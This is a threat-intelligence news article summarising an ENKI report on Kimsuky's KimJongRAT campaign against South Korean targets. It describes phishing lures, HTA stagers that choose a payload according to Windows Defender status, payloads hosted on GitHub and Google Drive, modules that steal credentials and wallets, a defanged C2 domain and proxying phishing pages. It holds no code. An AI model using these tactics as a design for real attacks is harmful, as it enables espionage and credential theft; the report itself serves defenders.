Kimsuky APT Deploys Dual KimJongRAT Payloads, Switching Between PE/PowerShell Based on Windows Defender Status

A newly published investigation by the ENKI WhiteHat Threat Research Team reveals a rapidly expanding and increasingly sophisticated cyber-espionage campaign by Kimsuky, the DPRK-linked threat actor, leveraging upgraded variants of KimJongRAT across South Korea.

The report describes an attack chain that blends phishing emails, weaponized LNK files, PowerShell-based RAT modules, Google Drive–hosted payloads, and GitHub Releases abuse—all orchestrated to maximize stealth and data-theft efficiency.

The campaign begins with phishing emails impersonating South Korean public agencies such as the Ministry of Gender Equality and Family and the National Tax Service. These emails deliver ZIP archives containing a password-protected decoy PDF and a malicious LNK file disguised as text.

Once clicked, victims are redirected through a C2 hop server that ultimately downloads payloads from GitHub. The attacker deliberately uploads malware to the Releases section, where “history, such as commit logs, is not recorded.”

This tactic erases forensic artifacts and conceals versioning activity.

The downloaded HTA files—pw.hta, doc.hta, or kyc.hta—handle both decoy display and malware staging. They download passwords from Google Drive to open the decoy PDF, creating a false sense of legitimacy.

These HTA files detect Windows Defender status and dynamically select the next-stage payload: a PE dropper or a PowerShell RAT. If Defender is stopped, victims receive v3.log (a PE chain); if Defender is active, they receive pipe.log (a PowerShell chain).

Once decrypted, the PE chain deploys sys.dll, an obfuscated module that performs:

• Anti-VM checks
• RC4-decryption of configuration
• Download of three Google Drive–hosted modules: app64.log, net64.log, and main64.log

The app64.log module is a precisely engineered tool used solely to retrieve Chrome’s AppBound Encryption master keys.
ENKI confirms: “The attacker built this module on top of a publicly available tool… designed to extract sensitive data from Chromium browsers.”

The net64.log module conducts extensive data theft, collecting:

• OS and hardware data
• Process lists
• Installed software
• Email client credentials
• Browser cookies, passwords, extensions
• Messenger data (Telegram/Discord)
• Cryptocurrency wallet files
• GPki/NPKI certificate stores

All exfiltrated data is archived as micro.log.zip and later transmitted to the C2 server.

The final PE-stage module, main64.log, establishes persistence and connects to the C2 domain kzloly.nmailhub[.]com for ongoing operations. It sets up four threads to handle:

• Clipboard capture
• Keylogging
• File enumeration
• Bi-directional C2 tasking

The report notes: “The C&C communication thread runs every 10 minutes to upload exfiltrated data… execute remote commands, and perform malware updates.”

The malware’s stealth features include timestamp forgery to match rundll32.exe, masking keylogging activity.

Beginning in 2024, Kimsuky operated a parallel PowerShell-based attack chain. By mid-2025, ENKI found that the attackers had merged both variants into a unified workflow, enabling them to dynamically switch between payloads depending on the environment.

The PowerShell chain collects:

• OS and CPU data
• Installed software
• Recent file lists
• Browser credentials
• Wallet directories
• Telegram artifacts

It then uploads an archive named init.dat XOR-encoded with 0xFE.

The report highlights the RAT’s functionality: “In effect, by placing rd, wr, and cmd on the C2, the attacker enables the Work function to interact with the server for file uploads, downloads, and remote command execution.”

Alongside KimJongRAT deployment, ENKI identified a growing network of phishing sites that mirror the login pages of South Korean services including Naver, Kakao, and Nate.

The phishing pages proxy the real login page while silently stealing credentials. The report warns: “The phishing page operates as a proxy that loads the legitimate login page while siphoning data passing between the victim and the page.”

One phishing page even contains attacker-added JavaScript with Korean-language comments—suggesting either a South Korean–style coder or an LLM imitation.

ENKI WhiteHat affirms alignment with past DPRK campaigns:

• Korean-language resource metadata
• PDB paths linking earlier malware families
• SSL fingerprint reuse across multiple phishing domains
• Overlaps with BabyShark, Giant Baby, and Baby Coin campaigns

The report concludes: “This analysis uncovered additional evidence supporting earlier reports that linked the KimJongRAT variant to the DPRK-nexus threat actor Kimsuky. Tactics such as crafting fake phishing sites… and conducting tailored spear-phishing using victims’ personal information are hallmarks of Kimsuky.”

Related Posts:

• KimJongRAT Returns: New PE & PowerShell Variants Steal Crypto and Browser Data via CDNs
• Lazarus Group Attacks Aerospace/Defense with New ChaCha20-Encrypted Comebacker Backdoor
• Major Threat: Vidar Stealer v2.0 Bypasses Chrome AppBound Encryption with Multithreaded Memory Injection
• North Korean APT Group Kimsuky Targets Japanese Organizations with Stealthy Malware Campaign